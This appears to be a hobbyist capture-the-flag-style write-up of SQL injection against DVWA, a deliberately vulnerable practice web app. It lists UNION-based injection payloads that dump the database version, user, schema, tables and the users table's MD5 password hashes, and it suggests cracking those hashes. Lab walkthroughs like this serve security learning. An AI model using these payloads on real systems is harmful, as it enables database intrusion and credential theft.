DVWA SQL Injection Write-up

Hello There in this Write-up i walk-through one of the famous vulnerability around the internet Globe and yes, that was a SQL Injection.

What is DVWA

What is Damn Vulnerable Web App (DVWA)? Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

SQL Injection

so basically SQL Injection is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

Injection Detail:

Vulnerability: SQL Injection

Difficulty Level : Easy

First will see what is SQL injection is actually

lets Power-up the DVWA and Set difficulties and lets Begin with the following

Select SQL Injection From Left pane and We begin

Input “1” into the text box. Click Submit.

Note, webpage/code is supposed to print ID, First name, and Surname to the screen, Below is the PHP select statement that we will be exploiting, specifically $id.

$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

Its Look Like Cheezy, Hmm We should Explore it more

Always True Scenario

Input the below text into the User ID Textbox (See Picture).

%’ or ‘0’=’0 Click Submit

In this scenario, we are saying display all record that are false and all records that are true. %’ — Will probably not be equal to anything, and will be false. ‘0’=’0' — Is equal to true, because 0 will always equal 0. Database Statement mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0';

Hmm, Found Some User, Intresting lets Dig Something

Display Database Version

Input the below text into the User ID Textbox (See Picture).

%’ or 0=0 union select null, version() # Click Submit

Notice in the last displayed line, 5.1.60 is displayed in the surname. This is the version of the MySQL database.

Yeaaa, We got Some Version

Display Database User

Input the below text into the User ID Textbox (See Picture).

%’ or 0=0 union select null, user() #

Notice in the last displayed line, root@localhost is displayed in the surname. This is the name of the database user that executed the behind the scenes PHP code.

Last Line is ❤

Display Database Name

Input the below text into the User ID Textbox (See Picture).

%’ or 0=0 union select null, database() #

Notice in the last displayed line, DVWA is displayed in the surname.

This is the name of the database.

Display All Table information in Information_schema

Input the below text into the User ID Textbox (See Picture).

%’ and 1=0 union select null, table_name from information_schema.tables # Click Submit

Now we are displaying all the tables in the information_schema database.

The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.

Wow, Lots of information is there

Display all the user tables in information_schema

Input the below text into the User ID Textbox (See Picture).

%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’# Click Submit

Now we are displaying all the tables that start with the prefix “user” in the information_schema database.

And User Will be Extracted

Display all the columns fields in the information_schema user table

Input the below text into the User ID Textbox (See Picture).

%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ # Click Submit

Now we are displaying all the columns in the users table.

Notice there are a user_id, first_name, last_name, user and Password column.

All the Column is Here

Display all the columns field contents in the information_schema user table

Input the below text into the User ID Textbox (See Picture).

%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # Click Submit

Now we have successfully displayed all the necessary authentication information into this database.

Its Called Hash Again :)

And That’s it We have a Password hash and it was Encoded in MD5 and you know its Quit Easy. just Decode it and Enjoy the Ultimate user :)

This Hack is Performed With DVWA and it’s Practice application, i wont harm any System for this Hack, and i’m not responsible for any Kind of hack Done by you its Educational Purpose only. B)

I hope You Will Understand the Write-up and Enjoy it

Peace…